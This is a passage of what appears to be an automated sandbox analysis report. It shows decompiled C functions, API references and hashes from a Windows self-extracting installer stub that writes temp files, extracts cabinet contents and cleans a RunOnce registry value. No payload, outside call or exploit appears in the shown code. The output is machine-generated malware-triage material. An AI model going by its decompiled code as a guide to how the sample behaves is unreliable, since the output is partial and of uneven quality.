                  • API ID: OpenQuery$CloseInfoValue
                  • String ID: PendingFileRenameOperations$System\CurrentControlSet\Control\Session Manager$System\CurrentControlSet\Control\Session Manager\FileRenameOperations
                  • API String ID: 2209512893-559176071
                  • Opcode ID: ca9f748b9ef0f45071d53c3ca70c1f55c0a583544e7018a53f06e0901f19ecd7
                  • Instruction ID: 59af907b38f202013b5063ffe5474d0b09e7234169596a1c18249fe4d436b0e4
                  • Opcode Fuzzy Hash: ca9f748b9ef0f45071d53c3ca70c1f55c0a583544e7018a53f06e0901f19ecd7
                  • Instruction Fuzzy Hash: 42118F75A42228FB9B24DBA2DC0DEEFBE6CEF017B1F100155B908E2152D6358E01F6A1
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 50%
                  			_entry_(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                  				signed int _t30;
                  				void* _t33;
                  				signed int _t34;
                  				int _t35;
                  				signed int _t43;
                  				signed int _t48;
                  				signed char _t49;
                  				signed int _t61;
                  				signed int _t63;
                  				intOrPtr* _t64;
                  				void* _t65;
                  				void* _t70;
                  				void* _t71;
                  
                  				E00F375A8();
                  				_push(0x5c);
                  				_push(0xf37900);
                  				E00F37674(__ebx, __edi, __esi);
                  				 *(_t65 - 0x24) =  *(_t65 - 0x24) & 0x00000000;
                  				 *(_t65 - 4) =  *(_t65 - 4) & 0x00000000;
                  				GetStartupInfoA(_t65 - 0x6c);
                  				 *(_t65 - 4) = 0xfffffffe;
                  				 *(_t65 - 4) = 1;
                  				_t61 =  *( *[fs:0x18] + 4);
                  				_t63 = 0;
                  				while(1) {
                  					_t48 = _t61;
                  					asm("lock cmpxchg [edx], ecx");
                  					if(0 == 0) {
                  						break;
                  					}
                  					if(0 != _t61) {
                  						Sleep(0x3e8);
                  						continue;
                  					} else {
                  						_t63 = 1;
                  					}
                  					break;
                  				}
                  				_t70 =  *0xf388f0 - 1; // 0x2
                  				if(_t70 != 0) {
                  					__eflags =  *0xf388f0;
                  					if(__eflags != 0) {
                  						 *0xf38224 = 1;
                  						goto L12;
                  					} else {
                  						 *0xf388f0 = 1;
                  						_t43 = E00F36BCA(_t48, 0xf3100c, 0xf31018); // executed
                  						__eflags = _t43;
                  						if(__eflags == 0) {
                  							goto L12;
                  						} else {
                  							 *(_t65 - 4) = 0xfffffffe;
                  						}
                  					}
                  				} else {
                  					_push(0x1f);
                  					L00F3742A();
                  					L12:
                  					_t71 =  *0xf388f0 - 1; // 0x2
                  					if(_t71 == 0) {
                  						_push(0xf31008);
                  						_push(0xf31000);
                  						L00F37668();
                  						 *0xf388f0 = 2;
                  					}
                  					if(_t63 == 0) {
                  						 *0xf388ec = 0;
                  					}
                  					_t74 =  *0xf388f8;
                  					if( *0xf388f8 != 0 && E00F374A0(_t74, 0xf388f8) != 0) {
                  						_t64 =  *0xf388f8; // 0x0
                  						 *0xf3a290(0, 2, 0);
                  						 *_t64();
                  					}
                  					_t63 =  *_acmdln;
                  					 *(_t65 - 0x20) = _t63;
                  					_t61 =  *(_t65 - 0x24);
                  					while(1) {
                  						_t49 =  *_t63;
                  						if(_t49 > 0x20 || _t49 != 0 && _t61 != 0) {
                  							goto L31;
                  						} else {
                  							goto L23;
                  						}
                  						while(1) {
                  							L23:
                  							_t33 =  *_t63;
                  							if(_t33 == 0 || _t33 > 0x20) {
                  								break;
                  							}
                  							_t63 = _t63 + 1;
                  							 *(_t65 - 0x20) = _t63;
                  						}
                  						__eflags =  *(_t65 - 0x40) & 0x00000001;
                  						if(( *(_t65 - 0x40) & 0x00000001) == 0) {
                  							_t34 = 0xa;
                  						} else {
                  							_t34 =  *(_t65 - 0x3c) & 0x0000ffff;
                  						}
                  						_push(_t34);
                  						_t35 = E00F32A7E(0xf30000, 0, _t63); // executed
                  						 *0xf38220 = _t35;
                  						__eflags =  *0xf38238;
                  						if( *0xf38238 == 0) {
                  							exit(_t35); // executed
                  							goto L31;
                  						}
                  						__eflags =  *0xf38224;
                  						if( *0xf38224 == 0) {
                  							__imp___cexit();
                  						}
                  						 *(_t65 - 4) = 0xfffffffe;
                  						goto L40;
                  						L31:
                  						__eflags = _t49 - 0x22;
                  						if(_t49 == 0x22) {
                  							__eflags = _t61;
                  							_t18 = _t61 == 0;
                  							__eflags = _t18;
                  							_t61 = 0 | _t18;
                  							 *(_t65 - 0x24) = _t61;
                  						}
                  						_t30 = _t49 & 0x000000ff;
                  						__imp___ismbblead(_t30);
                  						__eflags = _t30;
                  						if(_t30 != 0) {
                  							_t63 = _t63 + 1;
                  							__eflags = _t63;
                  							 *(_t65 - 0x20) = _t63;
                  						}
                  						_t63 = _t63 + 1;
                  						 *(_t65 - 0x20) = _t63;
                  					}
                  				}
                  				L40:
                  				return E00F376BC(1, _t61, _t63);
                  			}
















                  APIs
                  • GetStartupInfoA.KERNEL32(?), ref: 00F369F7
                  • _amsg_exit.MSVCRT ref: 00F36A36
                  • Sleep.KERNEL32(000003E8,?,?,?,?,?,?,?,?,00F37900,0000005C), ref: 00F36A43
                  • _initterm.MSVCRT ref: 00F36A8C
                  • __IsNonwritableInCurrentImage.LIBCMT ref: 00F36AB8
                  • exit.KERNELBASE ref: 00F36B30
                  • _ismbblead.MSVCRT ref: 00F36B4B
                  Memory Dump Source
                  • Source File: 00000000.00000002.511228963.0000000000F31000.00000020.00020000.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.511219365.0000000000F30000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.511243497.0000000000F38000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.511254163.0000000000F3A000.00000002.00020000.sdmp
                  Similarity
                  • API ID: CurrentImageInfoNonwritableSleepStartup_amsg_exit_initterm_ismbbleadexit
                  • String ID:
                  • API String ID: 359039474-0
                  • Opcode ID: 09560459b10378328f39a682401fa1d017ac8fe25d0d2f62e2c374b28a15fa9f
                  • Instruction ID: 25407580d03b94fbd0722b82f4916893a3217a42dfeecb9a4440a49b36123720
                  • Opcode Fuzzy Hash: 09560459b10378328f39a682401fa1d017ac8fe25d0d2f62e2c374b28a15fa9f
                  • Instruction Fuzzy Hash: B341EF71D44319EFDB20AF64DC1576AB7A1BB48771F208119E841E72D1CBB88841FA55
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 95%
                  			E00F3578F(intOrPtr* __ecx) {
                  				void* _v8;
                  				intOrPtr _t6;
                  				void* _t10;
                  				void* _t12;
                  				void* _t14;
                  				signed char _t16;
                  				void* _t20;
                  				void* _t23;
                  				intOrPtr* _t27;
                  				CHAR* _t33;
                  
                  				_push(__ecx);
                  				_t33 = __ecx;
                  				_t27 = __ecx;
                  				_t23 = __ecx + 1;
                  				do {
                  					_t6 =  *_t27;
                  					_t27 = _t27 + 1;
                  				} while (_t6 != 0);
                  				_t36 = _t27 - _t23 + 0x14;
                  				_t20 = LocalAlloc(0x40, _t27 - _t23 + 0x14);
                  				if(_t20 != 0) {
                  					E00F31485(_t20, _t36, _t33);
                  					E00F364E7(_t20, _t36, "TMP4351$.TMP");
                  					_t10 = CreateFileA(_t20, 0x40000000, 0, 0, 1, 0x4000080, 0); // executed
                  					_v8 = _t10;
                  					LocalFree(_t20);
                  					_t12 = _v8;
                  					if(_t12 == 0xffffffff) {
                  						goto L4;
                  					} else {
                  						CloseHandle(_t12);
                  						_t16 = GetFileAttributesA(_t33); // executed
                  						if(_t16 == 0xffffffff || (_t16 & 0x00000010) == 0) {
                  							goto L4;
                  						} else {
                  							 *0xf39a88 = 0;
                  							_t14 = 1;
                  						}
                  					}
                  				} else {
                  					E00F34327(0, 0x4b5, 0, 0, 0x10, 0);
                  					L4:
                  					 *0xf39a88 = E00F3613C();
                  					_t14 = 0;
                  				}
                  				return _t14;
                  			}













                  APIs
                  • LocalAlloc.KERNEL32(00000040,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00F353F6,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00F357AE
                  • CreateFileA.KERNELBASE(00000000,40000000,00000000,00000000,00000001,04000080,00000000,TMP4351$.TMP,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00F353F6,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00F3580A
                  • LocalFree.KERNEL32(00000000,?,00F353F6,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00F35814
                  • CloseHandle.KERNEL32(00000000,?,00F353F6,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00F35823
                  • GetFileAttributesA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00F353F6,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00F3582A
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.511228963.0000000000F31000.00000020.00020000.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.511219365.0000000000F30000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.511243497.0000000000F38000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.511254163.0000000000F3A000.00000002.00020000.sdmp
                  Similarity
                  • API ID: FileLocal$AllocAttributesCloseCreateFreeHandle
                  • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$TMP4351$.TMP
                  • API String ID: 747627703-2139698323
                  • Opcode ID: c76a0cdf43bde4858ca9e9e71134c3acdbff190936a5077f5be0a575325edba6
                  • Instruction ID: 19bfb4c7fc2d6bc8e626d0957d7a7dd95aa508a7fb0ee07b55f6b6788e8f2378
                  • Opcode Fuzzy Hash: c76a0cdf43bde4858ca9e9e71134c3acdbff190936a5077f5be0a575325edba6
                  • Instruction Fuzzy Hash: 101104B1A00218B7C7245B7A9C4DA9B7E5EEF86B70F104215B55AD3291DAB4DC06A2A0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E00F3508F() {
                  				int _t5;
                  				void* _t6;
                  				void* _t28;
                  
                  				_t1 = E00F34538("UPROMPT", 0, 0) + 1; // 0x1
                  				_t28 = LocalAlloc(0x40, _t1);
                  				if(_t28 != 0) {
                  					if(E00F34538("UPROMPT", _t28, _t29) != 0) {
                  						_t5 = lstrcmpA(_t28, "<None>"); // executed
                  						if(_t5 != 0) {
                  							_t6 = E00F34327(0, 0x3e9, _t28, 0, 0x20, 4);
                  							LocalFree(_t28);
                  							if(_t6 != 6) {
                  								 *0xf39a88 = 0x800704c7;
                  								L10:
                  								return 0;
                  							}
                  							 *0xf39a88 = 0;
                  							L6:
                  							return 1;
                  						}
                  						LocalFree(_t28);
                  						goto L6;
                  					}
                  					E00F34327(0, 0x4b1, 0, 0, 0x10, 0);
                  					LocalFree(_t28);
                  					 *0xf39a88 = 0x80070714;
                  					goto L10;
                  				}
                  				E00F34327(0, 0x4b5, 0, 0, 0x10, 0);
                  				 *0xf39a88 = E00F3613C();
                  				goto L10;
                  			}






                  APIs
                    • Part of subcall function 00F34538: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00F34549
                    • Part of subcall function 00F34538: SizeofResource.KERNEL32(00000000,00000000,?,00F32BA8,0000007F,?,?,?,?,?,?,00000000,00000001,00000000), ref: 00F34552
                  • LocalAlloc.KERNEL32(00000040,00000001,00000000,00000000,00000001,00000000,00F32DDE,00000000,00000001,00000000), ref: 00F350AB
                  • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 00F350FA
                    • Part of subcall function 00F34327: LoadStringA.USER32 ref: 00F3438D
                    • Part of subcall function 00F34327: MessageBoxA.USER32 ref: 00F343C9
                    • Part of subcall function 00F3613C: GetLastError.KERNEL32(00F35A9A), ref: 00F3613C
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.511228963.0000000000F31000.00000020.00020000.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.511219365.0000000000F30000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.511243497.0000000000F38000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.511254163.0000000000F3A000.00000002.00020000.sdmp
                  Similarity
                  • API ID: LocalResource$AllocErrorFindFreeLastLoadMessageSizeofString
                  • String ID: <None>$UPROMPT
                  • API String ID: 2239024442-2980973527
                  • Opcode ID: e32f797a772313d71f2f7e316030a030ba65a3d4ae95ca2132e6a50c2949ca19
                  • Instruction ID: fbc51ae2119f0b8c2dee5151410c2ca193b23d507917fc4c27adc65292fdb985
                  • Opcode Fuzzy Hash: e32f797a772313d71f2f7e316030a030ba65a3d4ae95ca2132e6a50c2949ca19
                  • Instruction Fuzzy Hash: C211E6B1604208ABD3143B255C85B7B759EEBC9B71F50442DB642D2290DABCDC017231
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E00F31E1D(void* __ecx) {
                  				void* _v8;
                  				long _t4;
                  
                  				if( *0xf38570 != 0) {
                  					_t4 = RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x20006,  &_v8); // executed
                  					if(_t4 == 0) {
                  						RegDeleteValueA(_v8, "wextract_cleanup0"); // executed
                  						return RegCloseKey(_v8);
                  					}
                  				}
                  				return _t4;
                  			}

                  APIs
                  • RegOpenKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00020006,?,?,?,00F35239), ref: 00F31E41
                  • RegDeleteValueA.KERNELBASE(?,wextract_cleanup0,?,?,00F35239), ref: 00F31E53
                  • RegCloseKey.ADVAPI32(?,?,?,00F35239), ref: 00F31E5C
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.511228963.0000000000F31000.00000020.00020000.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.511219365.0000000000F30000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.511243497.0000000000F38000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.511254163.0000000000F3A000.00000002.00020000.sdmp
                  Similarity
                  • API ID: CloseDeleteOpenValue
                  • String ID: Software\Microsoft\Windows\CurrentVersion\RunOnce$wextract_cleanup0
                  • API String ID: 849931509-702805525
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 92%
                  			E00F34BE0(void* __ebx, intOrPtr __edx, void* __edi, long _a4, long _a8) {
                  				signed int _v8;
                  				char _v268;
                  				void* __esi;
                  				signed int _t21;
                  				long _t22;
                  				long _t24;
                  				signed int _t25;
                  				long _t27;
                  				long _t28;
                  				struct HWND__* _t29;
                  				long _t30;
                  				long _t33;
                  				signed int _t36;
                  				long _t37;
                  				signed int _t39;
                  				void* _t42;
                  				void* _t54;
                  				long _t55;
                  				signed int _t56;
                  
                  				_t54 = __edi;
                  				_t53 = __edx;
                  				_t42 = __ebx;
                  				_t21 =  *0xf38000; // 0xfdaca2c3
                  				_t22 = _t21 ^ _t56;
                  				_v8 = _t22;
                  				_t55 = _a8;
                  				if( *0xf39218 == 0) {
                  					_t24 = _a4;
                  					__eflags = _t24;
                  					if(_t24 == 0) {
                  						_t25 = E00F34D3F(_t55);
                  						L25:
                  						return E00F36C20(_t25, _t42, _v8 ^ _t56, _t53, _t54, _t55);
                  					}
                  					_t27 = _t24 - 1;
                  					__eflags = _t27;
                  					if(_t27 == 0) {
                  						L20:
                  						_t25 = 0;
                  						goto L25;
                  					}
                  					_t28 = _t27 - 1;
                  					__eflags = _t28;
                  					if(_t28 == 0) {
                  						_t29 =  *0xf385c0; // 0x0
                  						__eflags = _t29;
                  						if(_t29 != 0) {
                  							SetDlgItemTextA(_t29, 0x837,  *(_t55 + 4));
                  						}
                  						_t22 = E00F345AF( &_v268, "C:\Users\hardz\AppData\Local\Temp\IXP000.TMP\",  *(_t55 + 4));
                  						__eflags = _t22;
                  						if(__eflags == 0) {
                  							L3:
                  							_t25 = _t22 | 0xffffffff;
                  							goto L25;
                  						} else {
                  							_t30 = E00F3464A( &_v268, __eflags);
                  							__eflags = _t30;
                  							if(_t30 != 0) {
                  								_push(0x180);
                  								_t22 = E00F34860( &_v268, 0x8302); // executed
                  								_t55 = _t22;
                  								__eflags = _t55 - 0xffffffff;
                  								if(_t55 == 0xffffffff) {
                  									goto L3;
                  								}
                  								_t22 = E00F346BC( &_v268);
                  								__eflags = _t22;
                  								if(_t22 == 0) {
                  									goto L3;
                  								}
                  								 *0xf39434 =  *0xf39434 + 1;
                  								_t25 = _t55;
                  								goto L25;
                  							}
                  							goto L20;
                  						}
                  					}
                  					_t33 = _t28 - 1;
                  					__eflags = _t33;
                  					if(_t33 == 0) {
                  						_t22 = E00F345AF( &_v268, "C:\Users\hardz\AppData\Local\Temp\IXP000.TMP\",  *(_t55 + 4));
                  						__eflags = _t22;
                  						if(_t22 == 0) {
                  							goto L3;
                  						}
                  						_t53 =  *((intOrPtr*)(_t55 + 0x18));
                  						_t22 = E00F34B3C( *((intOrPtr*)(_t55 + 0x14)),  *((intOrPtr*)(_t55 + 0x18)),  *(_t55 + 0x1a) & 0x0000ffff); // executed
                  						__eflags = _t22;
                  						if(_t22 == 0) {
                  							goto L3;
                  						}
                  						E00F34A60( *((intOrPtr*)(_t55 + 0x14))); // executed
                  						_t36 =  *(_t55 + 0x1c) & 0x0000ffff;
                  						__eflags = _t36;
                  						if(_t36 != 0) {
                  							_t37 = _t36 & 0x00000027;
                  							__eflags = _t37;
                  						} else {
                  							_t37 = 0x80;
                  						}
                  						_t39 = SetFileAttributesA( &_v268, _t37); // executed
                  						asm("sbb eax, eax");
                  						_t25 = ( ~_t39 & 0x00000002) - 1;
                  						goto L25;
                  					}
                  					_t22 = _t33 - 1;
                  					__eflags = _t22;
                  					if(_t22 == 0) {
                  						goto L3;
                  					}
                  					goto L20;
                  				}
                  				if(_a4 == 3) {
                  					_t22 = E00F34A60( *((intOrPtr*)(_t55 + 0x14)));
                  				}
                  				goto L3;
                  			}

                  APIs
                  • SetFileAttributesA.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?), ref: 00F34C8A
                  • SetDlgItemTextA.USER32 ref: 00F34CAF
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.511228963.0000000000F31000.00000020.00020000.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.511219365.0000000000F30000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.511243497.0000000000F38000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.511254163.0000000000F3A000.00000002.00020000.sdmp
                  Similarity
                  • API ID: AttributesFileItemText
                  • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                  • API String ID: 3625706803-2312194364
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 86%
                  			E00F34B3C(signed int __ecx, int __edx, int _a4) {
                  				struct _FILETIME _v12;
                  				struct _FILETIME _v20;
                  				signed int _t15;
                  				signed int _t20;
                  
                  				_t20 = __ecx * 0x18;
                  				if( *((intOrPtr*)(_t20 + 0xf38c84)) != 1) {
                  					if(DosDateTimeToFileTime(__edx, _a4,  &_v20) == 0 || LocalFileTimeToFileTime( &_v20,  &_v12) == 0) {
                  						goto L1;
                  					} else {
                  						_t15 = SetFileTime( *(_t20 + 0xf38c94),  &_v12,  &_v12, _t14); // executed
                  						asm("sbb eax, eax");
                  						return  ~( ~_t15);
                  					}
                  				}
                  				L1:
                  				return 0;
                  			}

                  APIs
                  • DosDateTimeToFileTime.KERNEL32 ref: 00F34B5D
                  • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00F34B6F
                  • SetFileTime.KERNELBASE(?,?,?,?), ref: 00F34B85
                  Memory Dump Source
                  • Source File: 00000000.00000002.511228963.0000000000F31000.00000020.00020000.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.511219365.0000000000F30000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.511243497.0000000000F38000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.511254163.0000000000F3A000.00000002.00020000.sdmp
                  Similarity
                  • API ID: Time$File$DateLocal
                  • String ID:
                  • API String ID: 2071732420-0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 85%
                  			E00F3475B(CHAR* __ecx, signed int __edx) {
                  				void* _t7;
                  				signed int _t11;
                  				long _t15;
                  				CHAR* _t23;
                  				long _t24;
                  
                  				_t11 = __edx;
                  				_t24 = 0x80000000;
                  				_t23 = __ecx;
                  				if((__edx & 0x00000003) != 0) {
                  					_t24 = 0x40000000;
                  				}
                  				if((_t11 & 0x00000100) == 0) {
                  					asm("sbb ebx, ebx");
                  					_t15 = ( ~(_t11 & 0x00000200) & 0x00000002) + 3;
                  				} else {
                  					if((_t11 & 0x00000400) == 0) {
                  						asm("sbb ebx, ebx");
                  						_t15 = ( ~(_t11 & 0x00000200) & 0xfffffffe) + 4;
                  					} else {
                  						_t15 = 1;
                  					}
                  				}
                  				_t7 = CreateFileA(_t23, _t24, 0, 0, _t15, 0x80, 0); // executed
                  				if(_t7 != 0xffffffff || _t15 == 3) {
                  					return _t7;
                  				} else {
                  					E00F347EA(_t23);
                  					return CreateFileA(_t23, _t24, 0, 0, _t15, 0x80, 0);
                  				}
                  			}

                  APIs
                  • CreateFileA.KERNELBASE(00000180,80000000,00000000,00000000,00007FFD,00000080,00000000,00000000,00000000,00000000,00F34909,?,00F34E12,*MEMCAB,00008000,00000180), ref: 00F347B7
                  • CreateFileA.KERNEL32(00000180,80000000,00000000,00000000,00007FFD,00000080,00000000,?,00F34E12,*MEMCAB,00008000,00000180,CABINET), ref: 00F347DB
                  Memory Dump Source
                  • Source File: 00000000.00000002.511228963.0000000000F31000.00000020.00020000.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.511219365.0000000000F30000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.511243497.0000000000F38000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.511254163.0000000000F3A000.00000002.00020000.sdmp
                  Similarity
                  • API ID: CreateFile
                  • String ID:
                  • API String ID: 823142352-0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 93%
                  			E00F349C0(signed int _a4, void* _a8, long _a12) {
                  				signed int _t9;
                  				int _t12;
                  				signed int _t14;
                  				signed int _t15;
                  				void* _t20;
                  				struct HWND__* _t21;
                  				signed int _t24;
                  				signed int _t25;
                  
                  				_t20 =  *0xf385cc; // 0x270
                  				_t9 = E00F33514(_t20);
                  				if( *0xf39218 == 0) {
                  					_push(_t24);
                  					_t12 = WriteFile( *(0xf38c94 + _a4 * 0x18), _a8, _a12,  &_a12, 0); // executed
                  					if(_t12 != 0) {
                  						_t25 = _a12;
                  						if(_t25 != 0xffffffff) {
                  							_t14 =  *0xf39440; // 0x19000
                  							_t15 = _t14 + _t25;
                  							 *0xf39440 = _t15;
                  							if( *0xf381f8 != 0) {
                  								_t21 =  *0xf385c0; // 0x0
                  								if(_t21 != 0) {
                  									SendDlgItemMessageA(_t21, 0x83a, 0x402, _t15 * 0x64 /  *0xf39438, 0);
                  								}
                  							}
                  						}
                  					} else {
                  						_t25 = _t24 | 0xffffffff;
                  					}
                  					return _t25;
                  				} else {
                  					return _t9 | 0xffffffff;
                  				}
                  			}

                  APIs
                    • Part of subcall function 00F33514: MsgWaitForMultipleObjects.USER32 ref: 00F33533
                    • Part of subcall function 00F33514: PeekMessageA.USER32 ref: 00F33546
                    • Part of subcall function 00F33514: PeekMessageA.USER32 ref: 00F3356E
                  • WriteFile.KERNELBASE(?,?,?,?,00000000), ref: 00F349F5
                  Memory Dump Source
                  • Source File: 00000000.00000002.511228963.0000000000F31000.00000020.00020000.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.511219365.0000000000F30000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.511243497.0000000000F38000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.511254163.0000000000F3A000.00000002.00020000.sdmp
                  Similarity
                  • API ID: MessagePeek$FileMultipleObjectsWaitWrite
                  • String ID:
                  • API String ID: 1084409-0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E00F364E7(char* __ecx, void* __edx, char* _a4) {
                  				void* __edi;
                  				intOrPtr _t4;
                  				char* _t6;
                  				char* _t8;
                  				void* _t10;
                  				void* _t12;
                  				char* _t16;
                  				intOrPtr* _t17;
                  				void* _t18;
                  				char* _t19;
                  
                  				_t16 = __ecx;
                  				_t10 = __edx;
                  				_t17 = __ecx;
                  				_t1 = _t17 + 1; // 0xf3895b
                  				_t12 = _t1;
                  				do {
                  					_t4 =  *_t17;
                  					_t17 = _t17 + 1;
                  				} while (_t4 != 0);
                  				_t18 = _t17 - _t12;
                  				_t2 = _t18 + 1; // 0xf3895c
                  				if(_t2 < __edx) {
                  					_t19 = _t18 + __ecx;
                  					if(_t19 > __ecx) {
                  						_t8 = CharPrevA(__ecx, _t19); // executed
                  						if( *_t8 != 0x5c) {
                  							 *_t19 = 0x5c;
                  							_t19 =  &(_t19[1]);
                  						}
                  					}
                  					_t6 = _a4;
                  					 *_t19 = 0;
                  					while( *_t6 == 0x20) {
                  						_t6 = _t6 + 1;
                  					}
                  					return E00F314BD(_t16, _t10, _t16, _t6);
                  				}
                  				return 0x8007007a;
                  			}

                  APIs
                  • CharPrevA.USER32(00F3895A,00F3895B,00000001,00000000,00F3895A,?,00F35F9C,00F31111,?), ref: 00F36517
                  Memory Dump Source
                  • Source File: 00000000.00000002.511228963.0000000000F31000.00000020.00020000.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.511219365.0000000000F30000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.511243497.0000000000F38000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.511254163.0000000000F3A000.00000002.00020000.sdmp
                  Similarity
                  • API ID: CharPrev
                  • String ID:
                  • API String ID: 122130370-0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 93%
                  			E00F360D0() {
                  				signed int _v8;
                  				char _v268;
                  				signed int _t5;
                  				void* _t9;
                  				void* _t13;
                  				void* _t19;
                  				void* _t20;
                  				signed int _t21;
                  
                  				_t5 =  *0xf38000; // 0xfdaca2c3
                  				_v8 = _t5 ^ _t21;
                  				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
                  					0x4f0 = 2;
                  					_t9 = E00F35849( &_v268, 0x4f0, _t19, 0x4f0); // executed
                  				} else {
                  					E00F34327(0, 0x4f0, _t8, _t8, 0x10, _t8);
                  					 *0xf39a88 = E00F3613C();
                  					_t9 = 0;
                  				}
                  				return E00F36C20(_t9, _t13, _v8 ^ _t21, 0x4f0, _t19, _t20);
                  			}

                  APIs
                  • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00F360F1
                    • Part of subcall function 00F34327: LoadStringA.USER32 ref: 00F3438D
                    • Part of subcall function 00F34327: MessageBoxA.USER32 ref: 00F343C9
                    • Part of subcall function 00F3613C: GetLastError.KERNEL32(00F35A9A), ref: 00F3613C
                  Memory Dump Source
                  • Source File: 00000000.00000002.511228963.0000000000F31000.00000020.00020000.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.511219365.0000000000F30000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.511243497.0000000000F38000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.511254163.0000000000F3A000.00000002.00020000.sdmp
                  Similarity
                  • API ID: DirectoryErrorLastLoadMessageStringWindows
                  • String ID:
                  • API String ID: 381621628-0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E00F34A60(signed int _a4) {
                  				signed int _t9;
                  				signed int _t15;
                  
                  				_t15 = _a4 * 0x18;
                  				if( *((intOrPtr*)(_t15 + 0xf38c84)) != 1) {
                  					_t9 = FindCloseChangeNotification( *(_t15 + 0xf38c94)); // executed
                  					if(_t9 == 0) {
                  						return _t9 | 0xffffffff;
                  					}
                  					 *((intOrPtr*)(_t15 + 0xf38c80)) = 1;
                  					return 0;
                  				}
                  				 *((intOrPtr*)(_t15 + 0xf38c80)) = 1;
                  				 *((intOrPtr*)(_t15 + 0xf38c88)) = 0;
                  				 *((intOrPtr*)(_t15 + 0xf38c90)) = 0;
                  				 *((intOrPtr*)(_t15 + 0xf38c8c)) = 0;
                  				return 0;
                  			}

                  APIs
                  • FindCloseChangeNotification.KERNELBASE(?,00000000,00000000,?,00F34E4C,00000000), ref: 00F34A98
                  Memory Dump Source
                  • Source File: 00000000.00000002.511228963.0000000000F31000.00000020.00020000.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.511219365.0000000000F30000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.511243497.0000000000F38000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.511254163.0000000000F3A000.00000002.00020000.sdmp
                  Similarity
                  • API ID: ChangeCloseFindNotification
                  • String ID:
                  • API String ID: 2591292051-0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E00F364C8(CHAR* __ecx) {
                  				unsigned int _t1;
                  
                  				_t1 = GetFileAttributesA(__ecx); // executed
                  				if(_t1 != 0xffffffff) {
                  					return  !(_t1 >> 4) & 0x00000001;
                  				} else {
                  					return 0;
